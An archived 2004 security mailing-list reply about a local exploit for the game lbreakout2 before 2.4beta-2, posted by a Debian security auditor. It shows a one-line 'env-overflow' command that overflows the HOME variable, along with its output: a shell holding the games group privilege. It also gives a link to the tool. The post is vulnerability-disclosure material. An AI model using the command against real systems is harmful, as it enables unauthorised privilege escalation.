Re: lbreakout2 < 2.4beta-2 local exploit

From: Steve Kemp (steve_at_steve.org.uk)
Date: 02/23/04

  • Next message: Shaun Colley: "3Com DSL Router Long Request DoS exploit."
    Date: Mon, 23 Feb 2004 20:26:03 +0000
    To: Li0n7@voila.fr
    
    

    On Sun, Feb 22, 2004 at 01:45:45PM -0000, Li0n7@voila.fr wrote:

    > /*
    > * lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr
    > * vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se>
    > * usage: ./lbreakout2-exp [-r <RET>][-b [-s <STARTING_RET>]]
    > *
    > */

        I much prefer mine ;)

        Using the `env-overflow` tool this may be exploited without
       the need for a valid X11 display - ie. ssh/telnet access
       sufficient - or any explicit coding:

       skx@uml:~$ ./env-overflow /usr/games/lbreakout2 1084 HOME
       ... snip ...
       sh-2.05a$
       sh-2.05a$ id
       uid=1000(skx) gid=100(users) egid=60(games) groups=100(users)

       Where env-overflow lives here:

               http://www.steve.org.uk/Hacks/generic.html

    Steve

    --
    # Debian Security Audit Project
    http://www.shellcode.org/Audit/
    

  • Next message: Shaun Colley: "3Com DSL Router Long Request DoS exploit."